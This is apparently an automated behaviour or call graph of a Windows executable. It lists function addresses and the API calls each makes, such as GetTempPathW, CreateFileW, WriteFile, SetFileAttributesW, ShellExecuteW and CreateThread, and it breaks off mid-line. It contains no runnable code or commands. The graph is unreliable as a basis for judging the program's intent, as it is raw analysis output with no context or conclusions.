9315 4060a2 memset 9313->9315 9314->9299 9316 4060e1 9315->9316 9317 404594 2 API calls 9316->9317 9318 4060fe 9317->9318 9319 401329 2 API calls 9318->9319 9320 406109 9319->9320 9321 403b7f 19 API calls 9320->9321 9322 406112 9321->9322 9323 4061b1 9322->9323 9527 4021ed 9322->9527 9325 4062ee ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9323->9325 9327 4061c5 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9323->9327 9325->9257 9327->9253 9328 406150 9330 403b7f 19 API calls 9328->9330 9329 401429 2 API calls 9331 406147 9329->9331 9332 406168 ShellExecuteExW 9330->9332 9334 40254d 2 API calls 9331->9334 9335 406282 9332->9335 9336 40618c 9332->9336 9334->9328 9339 407776 55 API calls 9335->9339 9337 4061a0 CloseHandle 9336->9337 9338 406192 WaitForSingleObject 9336->9338 9758 402185 9337->9758 9338->9337 9341 40628c 9339->9341 9342 403e0d 16 API calls 9341->9342 9343 406291 9 API calls 9342->9343 9344 4062e1 9343->9344 9344->9325 9346 401b6c SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9345->9346 9347 401b9f GetVersionExW 9345->9347 9346->9347 9347->9043 9347->9044 9349 40112b 2 API calls 9348->9349 9350 403e38 GetCommandLineW 9349->9350 9351 404594 9350->9351 9352 4045ce 9351->9352 9355 4045a2 9351->9355 9354 401429 2 API calls 9352->9354 9356 4045c6 9352->9356 9353 401429 2 API calls 9353->9355 9354->9352 9355->9353 9355->9356 9356->9055 9358 401411 2 API calls 9357->9358 9364 402a79 9358->9364 9359 401362 2 API calls 9360 402b6c ??3@YAXPAX 9359->9360 9360->9058 9361 402b5f 9361->9359 9363 401411 2 API calls 9363->9364 9364->9361 9364->9363 9365 401429 ??2@YAPAXI ??3@YAXPAX 9364->9365 9367 401362 2 API calls 9364->9367 9805 4025c6 9364->9805 9808 40272e 9364->9808 9365->9364 9368 402ad9 ??3@YAXPAX 9367->9368 9369 4013e2 2 API calls 9368->9369 9370 402aee ??3@YAXPAX ??3@YAXPAX 9369->9370 9370->9364 9372 403d80 9371->9372 9373 403dbd 9372->9373 9374 403d9a lstrlenW lstrlenW 9372->9374 9373->9061 9373->9063 9819 401a85 9374->9819 9377 401f47 3 API calls 9376->9377 9378 404416 9377->9378 9379 401f9d 19 API calls 9378->9379 9380 40441d 9379->9380 9381 401f9d 19 API calls 9380->9381 9382 404429 9381->9382 9383 401f9d 19 API calls 9382->9383 9384 404435 9383->9384 9385 401f9d 19 API calls 9384->9385 9386 404441 9385->9386 9387 401f9d 19 API calls 9386->9387 9388 40444d 9387->9388 9389 401f9d 19 API calls 9388->9389 9390 404459 9389->9390 9391 401f9d 19 API calls 9390->9391 9392 404465 9391->9392 9393 404480 SHGetSpecialFolderPathW 9392->9393 9396 404533 #17 9392->9396 9397 401411 2 API calls 9392->9397 9398 401329 ??2@YAPAXI ??3@YAXPAX 9392->9398 9400 402f6c 7 API calls 9392->9400 9824 402425 ??3@YAXPAX ??3@YAXPAX 9392->9824 9393->9392 9394 40449a wsprintfW 9393->9394 9395 401411 2 API calls 9394->9395 9395->9392 9396->9064 9397->9392 9398->9392 9400->9392 9402 4022b0 2 API calls 9401->9402 9403 4025c2 9402->9403 9403->9107 9825 403e86 9404->9825 9406 404e56 9407 403e86 2 API calls 9406->9407 9408 404e65 9407->9408 9829 404343 9408->9829 9412 404e82 ??3@YAXPAX 9413 404343 3 API calls 9412->9413 9414 404e9d 9413->9414 9415 403ec1 2 API calls 9414->9415 9416 404ea8 ??3@YAXPAX wsprintfA 9415->9416 9845 403ef6 9416->9845 9418 404ed0 9419 403ef6 2 API calls 9418->9419 9420 404edb 9419->9420 9421 402844 9420->9421 9422 402851 9421->9422 9430 40dcfb 3 API calls 9422->9430 9423 402863 lstrlenA lstrlenA 9428 402890 9423->9428 9424 40296e 9424->9119 9424->9120 9425 40293b memmove 9425->9424 9425->9428 9426 4028db memcmp 9426->9424 9426->9428 9427 402918 memcmp 9427->9428 9428->9424 9428->9425 9428->9426 9428->9427 9431 40dcc7 GetLastError 9428->9431 9856 402640 9428->9856 9430->9423 9431->9428 9433 40243b lstrcmpW 9432->9433 9434 40461c 9433->9434 9435 40466c 9434->9435 9437 401329 2 API calls 9434->9437 9436 40243b lstrcmpW 9435->9436 9438 40468a 9436->9438 9439 404633 9437->9439 9442 40243b lstrcmpW 9438->9442 9440 401f9d 19 API calls 9439->9440 9441 40463a 9440->9441 9444 40254d 2 API calls 9441->9444 9443 4046a2 9442->9443 9446 40243b lstrcmpW 9443->9446 9445 404643 9444->9445 9447 401329 2 API calls 9445->9447 9448 4046ba 9446->9448 9449 40465c 9447->9449 9451 40243b lstrcmpW 9448->9451 9450 401f9d 19 API calls 9449->9450 9452 404663 9450->9452 9453 4046d2 9451->9453 9454 40254d 2 API calls 9452->9454 9455 4046e9 9453->9455 9456 4046d9 lstrcmpiW 9453->9456 9454->9435 9457 40243b lstrcmpW 9455->9457 9456->9455 9458 4046ff 9457->9458 9459 40243b lstrcmpW 9458->9459 9460 40472c 9459->9460 9461 404739 9460->9461 9859 403d1f 9460->9859 9463 40243b lstrcmpW 9461->9463 9467 40474d 9463->9467 9464 40476d 9465 40243b lstrcmpW 9464->9465 9472 404780 9465->9472 9467->9464 9468 40243b lstrcmpW 9467->9468 9863 403cc6 9467->9863 9468->9467 9469 4047a0 9471 40243b lstrcmpW 9469->9471 9473 4047ac 9471->9473 9472->9469 9474 40243b lstrcmpW 9472->9474 9867 403cf7 9472->9867 9475 40243b lstrcmpW 9473->9475 9474->9472 9476 4047bd 9475->9476 9477 40243b lstrcmpW 9476->9477 9478 4047ce 9477->9478 9479 4047e4 9478->9479 9480 4047db _wtol 9478->9480 9481 40243b lstrcmpW 9479->9481 9480->9479 9482 4047f0 9481->9482 9483 404800 9482->9483 9484 4047f7 _wtol 9482->9484 9485 40243b lstrcmpW 9483->9485 9484->9483 9486 40480c 9485->9486 9487 40243b lstrcmpW 9486->9487 9488 404824 9487->9488 9489 40243b lstrcmpW 9488->9489 9490 40483c 9489->9490 9490->9176 9875 4023dd 9491->9875 9495 404045 9494->9495 9496 404088 9494->9496 9497 4012f7 2 API calls 9495->9497 9498 403b7f 19 API calls 9495->9498 9496->9159 9496->9160 9497->9495 9499 404062 SetEnvironmentVariableW ??3@YAXPAX 9498->9499 9499->9495 9499->9496 9501 40393b 7 API calls 9500->9501 9502 403b69 9501->9502 9503 4039f6 7 API calls 9502->9503 9504 403b74 9503->9504 9505 4027c7 6 API calls 9504->9505 9506 403b7a 9505->9506 9506->9180 9662 4083b6 9506->9662 9879 408676 9507->9879 9509 404a55 ??2@YAPAXI 9510 404a64 9509->9510 9524 40dcfb 3 API calls 9510->9524 9511 404a85 9881 40b2fc 9511->9881 9887 40a7de _EH_prolog 9511->9887 9512 404a95 9513 404ab3 9512->9513 9514 404a99 9512->9514 9516 404ada ??2@YAPAXI 9513->9516 9519 403354 86 API calls 9513->9519 9515 407776 55 API calls 9514->9515 9523 404aa1 9515->9523 9517 404ae6 9516->9517 9518 404aed 9516->9518 9922 404292 9517->9922 9903 40150b 9518->9903 9521 404ac6 9519->9521 9521->9516 9521->9523 9523->9225 9524->9511 9528 402200 LoadLibraryA GetProcAddress 9527->9528 9529 4021fb 9527->9529 9530 40221b 9528->9530 9531 402223 9528->9531 9529->9323 9529->9328 9529->9329 9530->9529 9531->9530 10385 4021b9 LoadLibraryA GetProcAddress 9531->10385 9534 401411 2 API calls 9533->9534 9541 4048bc 9534->9541 9535 401329 2 API calls 9535->9541 9536 40494e 9537 404988 ??3@YAXPAX 9536->9537 9539 4048ab 3 API calls 9536->9539 9537->9276 9538 401429 2 API calls 9538->9541 9540 404985 9539->9540 9540->9537 9541->9535 9541->9536 9541->9538 9542 40243b lstrcmpW 9541->9542 9542->9541 9544 40661a 2 API calls 9543->9544 9545 4049af 9544->9545 9546 401f9d 19 API calls 9545->9546 9547 4049bd 9546->9547 9548 4024fc 2 API calls 9547->9548 9549 4049c7 9548->9549 9550 4049fd 9549->9550 9552 40254d ??2@YAPAXI ??3@YAXPAX 9549->9552 9551 40254d 2 API calls 9550->9551 9553 404a0a 9551->9553 9552->9549 9554 401f9d 19 API calls 9553->9554 9555 404a11 9554->9555 9556 40254d 2 API calls 9555->9556 9557 404a1b 9556->9557 9558 4073d1 21 API calls 9557->9558 9559 404a30 ??3@YAXPAX 9558->9559 9560 404a41 ctype 9559->9560 9560->9083 9562 40e8da ctype 3 API calls 9561->9562 9563 403e7e 9562->9563 9564 40e8da ctype 3 API calls 9563->9564 9565 40e943 ??3@YAXPAX 9564->9565 9565->9077 9567 40db53 2 API calls 9566->9567 9568 404ce8 9567->9568 9569 404d44 9568->9569 9571 4024fc 2 API calls 9568->9571 9570 4025ae 2 API calls 9569->9570 9572 404d4c 9570->9572 9573 404cf7 9571->9573 9574 403e86 2 API calls 9572->9574 9577 404db5 ??3@YAXPAX 9573->9577 9579 403354 86 API calls 9573->9579 9575 404d59 9574->9575 9576 403ef6 2 API calls 9575->9576 9578 404d66 9576->9578 9591 404db1 9577->9591 9580 403ef6 2 API calls 9578->9580 9581 404d1b 9579->9581 9582 404d73 9580->9582 9581->9577 9584 40db53 2 API calls 9581->9584 9583 403ef6 2 API calls 9582->9583 9585 404d80 9583->9585 9586 404d37 9584->9586 9587 40dd5f 2 API calls 9585->9587 9586->9577 9588 404d3b ??3@YAXPAX 9586->9588 9589 404d94 9587->9589 9588->9569 9589->9577 9590 404d9d ??3@YAXPAX 9589->9590 9590->9591 9591->9142 9593 4025ae 2 API calls 9592->9593 9609 4030a8 9593->9609 9594 403301 9595 403344 ??3@YAXPAX 9594->9595 9596 40334e 9595->9596 9596->9128 9596->9135 9597 401411 ??2@YAPAXI ??3@YAXPAX 9597->9609 9599 40272e ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9599->9609 9600 401362 2 API calls 9601 4030f3 ??3@YAXPAX ??3@YAXPAX 9600->9601 9602 403303 9601->9602 9601->9609 10393 4029c3 9602->10393 9606 40331c ??3@YAXPAX 9606->9596 9607 4031e5 strncmp 9608 4031d0 strncmp 9607->9608 9607->9609 9608->9607 9608->9609 9609->9594 9609->9597 9609->9599 9609->9600 9609->9602 9609->9607 9610 401362 2 API calls 9609->9610 9611 402640 2 API calls 9609->9611 9614 402640 ??2@YAPAXI ??3@YAXPAX 9609->9614 9616 4023dd lstrcmpW 9609->9616 9617 402f6c 7 API calls 9609->9617 9619 403330 9609->9619 9620 4032b2 lstrcmpW 9609->9620 9624 401329 2 API calls 9609->9624 10387 402986 9609->10387 10392 402425 ??3@YAXPAX ??3@YAXPAX 9609->10392 9612 403252 ??3@YAXPAX 9610->9612 9611->9608 9613 402a69 9 API calls 9612->9613 9615 403263 lstrcmpW 9613->9615 9614->9609 9615->9609 9616->9609 9617->9609 9622 402f6c 7 API calls 9619->9622 9620->9609 9621 4032c0 lstrcmpW 9620->9621 9621->9609 9623 40333c 9622->9623 10411 402425 ??3@YAXPAX ??3@YAXPAX 9623->10411 9624->9609 9627 402f86 9626->9627 9628 402f7b 9626->9628 9630 408761 4 API calls 9627->9630 10413 402668 9628->10413 9631 402f92 9630->9631 9631->9132 9632->9132 9634 4024fc 2 API calls 9633->9634 9635 40485f 9634->9635 9636 40254d 2 API calls 9635->9636 9637 40486c 9636->9637 9638 404888 9637->9638 9639 401429 2 API calls 9637->9639 9640 40254d 2 API calls 9638->9640 9639->9637 9641 404892 9640->9641 9642 40408b 94 API calls 9641->9642 9643 40489d ??3@YAXPAX 9642->9643 9643->9176 9645 4040a2 lstrlenW 9644->9645 9646 4040ce 9644->9646 9647 401a85 4 API calls 9645->9647 9646->9176 9648 4040b8 9647->9648 9648->9645 9648->9646 9649 4040d5 9648->9649 9650 4024fc 2 API calls 9649->9650 9653 4040de 9650->9653 10418 402776 9653->10418 9654 403093 84 API calls 9655 40414c 9654->9655 9656 404156 ??3@YAXPAX ??3@YAXPAX 9655->9656 9657 40416d ??3@YAXPAX ??3@YAXPAX 9655->9657 9656->9646 9657->9646 9658->9189 9660 40661a 2 API calls 9659->9660 9661 403b48 9660->9661 9661->9178 9663 408646 9662->9663 9675 4083d5 ctype 9662->9675 9663->9184 9664 40661a 2 API calls 9664->9675 9665 40786b 23 API calls 9665->9675 9666 40243b lstrcmpW 9666->9675 9668 407674 23 API calls 9668->9675 9669 407613 23 API calls 9669->9675 9670 403b40 2 API calls 9670->9675 9671 401f9d 19 API calls 9671->9675 9672 407776 55 API calls 9672->9675 9673 403f48 4 API calls 9673->9675 9674 4073d1 21 API calls 9674->9675 9675->9663 9675->9664 9675->9665 9675->9666 9675->9668 9675->9669 9675->9670 9675->9671 9675->9672 9675->9673 9675->9674 9676 407717 25 API calls 9675->9676 9677 4073d1 21 API calls 9675->9677 10428 40744b 9675->10428 9676->9675 9678 408476 ??3@YAXPAX 9677->9678 9678->9675 9680 40243b lstrcmpW 9679->9680 9681 4082fd 9680->9681 9682 40830b 9681->9682 10432 4019f0 GetStdHandle WriteFile 9681->10432 9684 40831e 9682->9684 10433 4019f0 GetStdHandle WriteFile 9682->10433 9686 408333 9684->9686 10434 4019f0 GetStdHandle WriteFile 9684->10434 9688 408344 9686->9688 10435 4019f0 GetStdHandle WriteFile 9686->10435 9690 40243b lstrcmpW 9688->9690 9691 408351 9690->9691 9694 40835f 9691->9694 10436 4019f0 GetStdHandle WriteFile 9691->10436 9693 40243b lstrcmpW 9695 40836c 9693->9695 9694->9693 9696 40837a 9695->9696 10437 4019f0 GetStdHandle WriteFile 9695->10437 9698 40243b lstrcmpW 9696->9698 9699 408387 9698->9699 9700 408395 9699->9700 10438 4019f0 GetStdHandle WriteFile 9699->10438 9702 40243b lstrcmpW 9700->9702 9703 4083a2 9702->9703 9704 4083b2 9703->9704 10439 4019f0 GetStdHandle WriteFile 9703->10439 9704->9180 9707 407636 9706->9707 9708 407658 9707->9708 9709 40764b 9707->9709 10443 407186 9708->10443 10440 407154 9709->10440 9712 407653 9713 4073d1 21 API calls 9712->9713 9714 407671 9713->9714 9714->9222 9716 407689 9715->9716 9717 40716d 2 API calls 9716->9717 9718 407694 9717->9718 9719 4073d1 21 API calls 9718->9719 9720 4076a5 9719->9720 9720->9222 9722 401411 2 API calls 9721->9722 9723 403f96 9722->9723 9724 402535 2 API calls 9723->9724 9725 403f9f GetTempPathW 9724->9725 9726 403fb8 9725->9726 9731 403fcf 9725->9731 9727 402535 2 API calls 9726->9727 9728 403fc3 GetTempPathW 9727->9728 9728->9731 9729 402535 2 API calls 9730 403ff2 wsprintfW 9729->9730 9730->9731 9731->9729 9732 404009 GetFileAttributesW 9731->9732 9733 40402d 9731->9733 9732->9731 9732->9733 9733->9207 9735 40787e 9734->9735 10449 40719f 9735->10449 9738 4073d1 21 API calls 9739 4078b3 9738->9739 9739->9225 9741 403e21 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9740->9741 9742 403e16 9740->9742 9741->9226 9743 402c86 16 API calls 9742->9743 9743->9741 9745 40243b lstrcmpW 9744->9745 9746 40455d 9745->9746 9747 404592 9746->9747 9748 401329 2 API calls 9746->9748 9747->9277 9749 40456c 9748->9749 9750 403b7f 19 API calls 9749->9750 9751 404572 9750->9751 9751->9747 9752 401429 2 API calls 9751->9752 9752->9747 9754 4012f7 2 API calls 9753->9754 9755 4043d4 9754->9755 9756 40254d 2 API calls 9755->9756 9757 4043df 9756->9757 9757->9266 9759 4021a9 9758->9759 9760 40218e LoadLibraryA GetProcAddress 9758->9760 9759->9323 9760->9759 9762 40661a 2 API calls 9761->9762 9763 403f50 9762->9763 9764 401411 2 API calls 9763->9764 9765 403f5e 9764->9765 9765->9251 9767 404cb1 ??3@YAXPAX 9766->9767 9769 404b15 9766->9769 9770 404cb7 9767->9770 9768 404b29 GetDriveTypeW 9768->9767 9771 404b55 9768->9771 9769->9767 9769->9768 9770->9236 9772 403f85 6 API calls 9771->9772 9773 404b63 CreateFileW 9772->9773 9774 404b89 9773->9774 9775 404c7b ??3@YAXPAX ??3@YAXPAX 9773->9775 9776 401411 2 API calls 9774->9776 9775->9770 9777 404b92 9776->9777 9778 401329 2 API calls 9777->9778 9779 404b9f 9778->9779 9780 40254d 2 API calls 9779->9780 9781 404bad 9780->9781 9782 4013e2 2 API calls 9781->9782 9783 404bb9 9782->9783 9784 40254d 2 API calls 9783->9784 9785 404bc7 9784->9785 9786 40254d 2 API calls 9785->9786 9787 404bd4 9786->9787 9788 4013e2 2 API calls 9787->9788 9789 404be0 9788->9789 9790 40254d 2 API calls 9789->9790 9791 404bed 9790->9791 9792 40254d 2 API calls 9791->9792 9793 404bf6 9792->9793 9794 4013e2 2 API calls 9793->9794 9795 404c02 9794->9795 9796 40254d 2 API calls 9795->9796 9797 404c0b 9796->9797 9798 402776 3 API calls 9797->9798 9799 404c1d WriteFile ??3@YAXPAX CloseHandle 9798->9799 9800 404c4b 9799->9800 9801 404c8c 9799->9801 9800->9801 9802 404c53 SetFileAttributesW ShellExecuteW ??3@YAXPAX 9800->9802 9803 402c86 16 API calls 9801->9803 9802->9775 9804 404c94 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9803->9804 9804->9770 9814 4022b0 9805->9814 9809 401411 2 API calls 9808->9809 9810 40273a 9809->9810 9811 402772 9810->9811 9812 402535 2 API calls 9810->9812 9811->9364 9813 402757 MultiByteToWideChar 9812->9813 9813->9811 9815 4022ea 9814->9815 9816 4022be ??2@YAPAXI 9814->9816 9815->9364 9816->9815 9818 4022cf 9816->9818 9817 4022e2 ??3@YAXPAX 9817->9815 9818->9817 9818->9818 9820 401ae3 9819->9820 9821 401a97 9819->9821 9820->9373 9821->9820 9822 401abc CharUpperW CharUpperW 9821->9822 9822->9821 9823 401af3 CharUpperW CharUpperW 9822->9823 9823->9820 9824->9392 9826 403e9e 9825->9826 9827 4022b0 2 API calls 9826->9827 9828 403eac 9827->9828 9828->9406 9830 40435e 9829->9830 9831 404375 9830->9831 9832 40436a 9830->9832 9833 4025ae 2 API calls 9831->9833 9849 4025f6 9832->9849 9834 40437e 9833->9834 9836 4022b0 2 API calls 9834->9836 9838 404387 9836->9838 9837 404373 9841 403ec1 9837->9841 9838->9838 9839 4025f6 2 API calls 9838->9839 9840 4043b5 ??3@YAXPAX 9839->9840 9840->9837 9842 403ecd 9841->9842 9844 403ede 9841->9844 9843 4022b0 2 API calls 9842->9843 9843->9844 9844->9412 9846 403f06 9845->9846 9846->9846 9852 4022fc 9846->9852 9848 403f13 9848->9418 9850 4022b0 2 API calls 9849->9850 9851 402610 9850->9851 9851->9837 9853 402340 9852->9853 9854 402310 9852->9854 9853->9848 9855 4022b0 2 API calls 9854->9855 9855->9853 9857 4022fc 2 API calls 9856->9857 9858 40264a 9857->9858 9858->9428 9860 403d3d 9859->9860 9871 403c63 9860->9871 9864 403cd3 9863->9864 9865 403c63 _wtol 9864->9865 9866 403cf4 9865->9866 9866->9467 9868 403d04 9867->9868 9869 403c63 _wtol 9868->9869 9870 403d1c 9869->9870 9870->9472 9872 403c6d 9871->9872 9873 403c88 _wtol 9872->9873 9874 403cc1 9872->9874 9873->9872 9874->9461 9876 4023e8 9875->9876 9877 402411 9876->9877 9878 4023f4 lstrcmpW 9876->9878 9877->9182 9878->9876 9878->9877 9880 408679 9879->9880 9880->9509 9882 40b30d 9881->9882 9886 40dcfb 3 API calls 9882->9886 9883 40b321 9884 40b331 9883->9884 9927 40b163 9883->9927 9884->9512 9886->9883 9888 40a7fe 9887->9888 9889 40b2fc 11 API calls 9888->9889 9890 40a823 9889->9890 9891 40a845 9890->9891 9892 40a82c 9890->9892 9955 40cc59 _EH_prolog 9891->9955 9958 40a3fe 9892->9958 9904 40151e 9903->9904 9905 401329 2 API calls 9904->9905 9906 40152b 9905->9906 9907 401429 2 API calls 9906->9907 9908 401534 CreateThread 9907->9908 9909 401563 9908->9909 9910 401568 WaitForSingleObject 9908->9910 10379 40129c 9908->10379 9911 40786b 23 API calls 9909->9911 9912 401585 9910->9912 9913 4015b7 9910->9913 9911->9910 9916 4015a3 9912->9916 9919 401594 9912->9919 9914 4015b3 9913->9914 9915 4015bf GetExitCodeThread 9913->9915 9914->9523 9917 4015d6 9915->9917 9918 407776 55 API calls 9916->9918 9917->9914 9917->9919 9920 401605 SetLastError 9917->9920 9918->9914 9919->9914 9921 407776 55 API calls 9919->9921 9920->9919 9921->9914 9923 401411 2 API calls 9922->9923 9924 4042ab 9923->9924 9925 401411 2 API calls 9924->9925 9926 4042b7 9925->9926 9926->9518 9940 40f0b6 9927->9940 9929 40b192 9929->9884 9930 40b17e 9930->9929 9943 40adc3 9930->9943 9933 40b297 ??3@YAXPAX 9933->9929 9934 40b2a2 ??3@YAXPAX 9934->9929 9936 40b27a memmove 9937 40b1d9 9936->9937 9937->9933 9937->9934 9937->9936 9938 40b2ac memcpy 9937->9938 9939 40dcfb 3 API calls 9938->9939 9939->9934 9951 40f06b 9940->9951 9944 40add0 9943->9944 9945 40ae0d memcpy 9943->9945 9946 40add5 ??2@YAPAXI 9944->9946 9947 40adfb 9944->9947 9945->9937 9948 40adfd ??3@YAXPAX 9946->9948 9949 40ade5 memmove 9946->9949 9947->9948 9948->9945 9949->9948 9952 40f0af 9951->9952 9953 40f07d 9951->9953 9952->9930 9953->9952 9954 40dcc7 GetLastError 9953->9954 9954->9953 9966 40c9fc 9955->9966 10362 40a28e 9958->10362 9988 40a0bf 9966->9988 10111 40a030 9988->10111 10112 40e8da ctype 3 API calls 10111->10112 10113 40a039 10112->10113 10114 40e8da ctype 3 API calls 10113->10114 10115 40a041 10114->10115 10116 40e8da ctype 3 API calls 10115->10116 10117 40a049 10116->10117 10118 40e8da ctype 3 API calls 10117->10118 10119 40a051 10118->10119 10120 40e8da ctype 3 API calls 10119->10120 10121 40a059 10120->10121 10122 40e8da ctype 3 API calls 10121->10122 10123 40a061 10122->10123 10124 40e8da ctype 3 API calls 10123->10124 10125 40a06b 10124->10125 10126 40e8da ctype 3 API calls 10125->10126 10127 40a073 10126->10127 10128 40e8da ctype 3 API calls 10127->10128 10129 40a080 10128->10129 10130 40e8da ctype 3 API calls 10129->10130 10131 40a088 10130->10131 10132 40e8da ctype 3 API calls 10131->10132 10133 40a095 10132->10133 10134 40e8da ctype 3 API calls 10133->10134 10135 40a09d 10134->10135 10136 40e8da ctype 3 API calls 10135->10136 10137 40a0aa 10136->10137 10138 40e8da ctype 3 API calls 10137->10138 10139 40a0b2 10138->10139 10363 40e8da ctype 3 API calls 10362->10363 10364 40a29c 10363->10364 10380 4012a5 10379->10380 10381 4012b8 10379->10381 10380->10381 10382 4012a7 Sleep 10380->10382 10383 4012f1 10381->10383 10384 4012e3 EndDialog 10381->10384 10382->10380 10384->10383 10386 4021db 10385->10386 10386->9530 10388 4025ae 2 API calls 10387->10388 10389 402992 10388->10389 10390 4029be 10389->10390 10391 402640 2 API calls 10389->10391 10390->9609 10391->10389 10392->9609 10394 4029d2 10393->10394 10395 4029de 10393->10395 10412 4019f0 GetStdHandle WriteFile 10394->10412 10397 4025ae 2 API calls 10395->10397 10401 4029e8 10397->10401 10398 4029d9 10410 402425 ??3@YAXPAX ??3@YAXPAX 10398->10410 10399 402a13 10400 40272e 3 API calls 10399->10400 10402 402a25 10400->10402 10401->10399 10405 402640 2 API calls 10401->10405 10403 402a33 10402->10403 10404 402a47 10402->10404 10406 407776 55 API calls 10403->10406 10407 407776 55 API calls 10404->10407 10405->10401 10408 402a42 ??3@YAXPAX ??3@YAXPAX 10406->10408 10407->10408 10408->10398 10410->9606 10411->9595 10412->10398 10414 4012f7 2 API calls 10413->10414 10415 402676 10414->10415 10416 4012f7 2 API calls 10415->10416 10417 402682 10416->10417 10417->9627 10419 4025ae 2 API calls 10418->10419 10420 402785 10419->10420 10421 4027c1 10420->10421 10424 402628 10420->10424 10421->9654 10425 402634 10424->10425 10426 40263a WideCharToMultiByte 10424->10426 10427 4022b0 2 API calls 10425->10427 10426->10421 10427->10426 10429 407456 10428->10429 10430 40745b 10428->10430 10429->9675 10430->10429 10431 4073d1 21 API calls 10430->10431 10431->10429 10432->9682 10433->9684 10434->9686 10435->9688 10436->9694 10437->9696 10438->9700 10439->9704 10441 40661a 2 API calls 10440->10441 10442 40715c 10441->10442 10442->9712 10446 40716d 10443->10446 10447 40661a 2 API calls 10446->10447 10448 407175 10447->10448 10448->9712 10450 40661a 2 API calls 10449->10450 10451 4071a7 10450->10451 10451->9738 8032 40f3f1 8035 4024e7 8032->8035 8040 40245a 8035->8040 8038 4024f5 8039 4024f6 malloc 8041 40246a 8040->8041 8047 402466 8040->8047 8042 40247a GlobalMemoryStatusEx 8041->8042 8041->8047 8043 402488 8042->8043 8042->8047 8043->8047 8048 401f9d 8043->8048 8047->8038 8047->8039 8049 401fb4 8048->8049 8050 401fe5 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8049->8050 8051 401fdb 8049->8051 8052 402095 SetLastError 8050->8052 8053 40201d ??2@YAPAXI GetEnvironmentVariableW 8050->8053 8068 407717 8051->8068 8052->8051 8058 4020ac 8052->8058 8054 40204c GetLastError 8053->8054 8067 40207e ??3@YAXPAX 8053->8067 8055 402052 8054->8055 8054->8067 8061 402081 8055->8061 8062 40205c lstrcmpiW 8055->8062 8057 4020cb lstrlenA ??2@YAPAXI 8059 402136 MultiByteToWideChar 8057->8059 8060 4020fc GetLocaleInfoW 8057->8060 8058->8057 8075 401f47 8058->8075 8059->8051 8060->8059 8065 402123 _wtol 8060->8065 8061->8052 8066 40206b ??3@YAXPAX 8062->8066 8062->8067 8064 4020c1 8064->8057 8065->8059 8066->8061 8067->8061 8082 40661a 8068->8082 8071 40773c IsBadReadPtr 8073 40774e 8071->8073 8086 4073d1 8073->8086 8076 401f51 GetUserDefaultUILanguage 8075->8076 8077 401f95 8075->8077 8078 401f72 GetSystemDefaultUILanguage 8076->8078 8079 401f6e 8076->8079 8077->8064 8078->8077 8080 401f7e GetSystemDefaultLCID 8078->8080 8079->8064 8080->8077 8081 401f8e 8080->8081 8081->8077 8083 406643 8082->8083 8084 40666f IsWindow 8082->8084 8083->8084 8085 40664b GetSystemMetrics GetSystemMetrics 8083->8085 8084->8071 8084->8073 8085->8084 8087 4073e0 8086->8087 8088 407444 8086->8088 8087->8088 8098 4024fc 8087->8098 8088->8047 8090 4073f1 8091 4024fc 2 API calls 8090->8091 8092 4073fc 8091->8092 8102 403b7f 8092->8102 8095 403b7f 19 API calls 8096 40740e ??3@YAXPAX ??3@YAXPAX 8095->8096 8096->8088 8099 402513 8098->8099 8111 40112b 8099->8111 8101 40251e 8101->8090 8175 403880 8102->8175 8104 403b59 8116 40393b 8104->8116 8106 403b69 8139 4039f6 8106->8139 8108 403b74 8162 4027c7 8108->8162 8112 401177 8111->8112 8113 401139 ??2@YAPAXI 8111->8113 8112->8101 8113->8112 8115 40115a 8113->8115 8114 40116f ??3@YAXPAX 8114->8112 8115->8114 8115->8115 8198 401411 8116->8198 8120 403954 8205 40254d 8120->8205 8122 403961 8123 4024fc 2 API calls 8122->8123 8124 40396e 8123->8124 8209 403805 8124->8209 8127 401362 2 API calls 8128 403992 8127->8128 8129 40254d 2 API calls 8128->8129 8130 40399f 8129->8130 8131 4024fc 2 API calls 8130->8131 8132 4039ac 8131->8132 8133 403805 3 API calls 8132->8133 8134 4039bc ??3@YAXPAX 8133->8134 8135 4024fc 2 API calls 8134->8135 8136 4039d3 8135->8136 8137 403805 3 API calls 8136->8137 8138 4039e2 ??3@YAXPAX ??3@YAXPAX 8137->8138 8138->8106 8140 401411 2 API calls 8139->8140 8141 403a04 8140->8141 8142 401362 2 API calls 8141->8142 8143 403a0f 8142->8143 8144 40254d 2 API calls 8143->8144 8145 403a1c 8144->8145 8146 4024fc 2 API calls 8145->8146 8147 403a29 8146->8147 8148 403805 3 API calls 8147->8148 8149 403a39 ??3@YAXPAX 8148->8149 8150 401362 2 API calls 8149->8150 8151 403a4d 8150->8151 8152 40254d 2 API calls 8151->8152 8153 403a5a 8152->8153 8154 4024fc 2 API calls 8153->8154 8155 403a67 8154->8155 8156 403805 3 API calls 8155->8156 8157 403a77 ??3@YAXPAX 8156->8157 8158 4024fc 2 API calls 8157->8158 8159 403a8e 8158->8159 8160 403805 3 API calls 8159->8160 8161 403a9d ??3@YAXPAX ??3@YAXPAX 8160->8161 8161->8108 8163 401411 2 API calls 8162->8163 8164 4027d5 8163->8164 8165 4027e5 ExpandEnvironmentStringsW 8164->8165 8166 40112b 2 API calls 8164->8166 8167 402809 8165->8167 8168 4027fe ??3@YAXPAX 8165->8168 8166->8165 8234 402535 8167->8234 8169 402840 8168->8169 8169->8095 8172 402824 8173 401362 2 API calls 8172->8173 8174 402838 ??3@YAXPAX 8173->8174 8174->8169 8176 401411 2 API calls 8175->8176 8177 40388e 8176->8177 8178 401362 2 API calls 8177->8178 8179 403899 8178->8179 8180 40254d 2 API calls 8179->8180 8181 4038a6 8180->8181 8182 4024fc 2 API calls 8181->8182 8183 4038b3 8182->8183 8184 403805 3 API calls 8183->8184 8185 4038c3 ??3@YAXPAX 8184->8185 8186 401362 2 API calls 8185->8186 8187 4038d7 8186->8187 8188 40254d 2 API calls 8187->8188 8189 4038e4 8188->8189 8190 4024fc 2 API calls 8189->8190 8191 4038f1 8190->8191 8192 403805 3 API calls 8191->8192 8193 403901 ??3@YAXPAX 8192->8193 8194 4024fc 2 API calls 8193->8194 8195 403918 8194->8195 8196 403805 3 API calls 8195->8196 8197 403927 ??3@YAXPAX ??3@YAXPAX 8196->8197 8197->8104 8199 40112b 2 API calls 8198->8199 8200 401425 8199->8200 8201 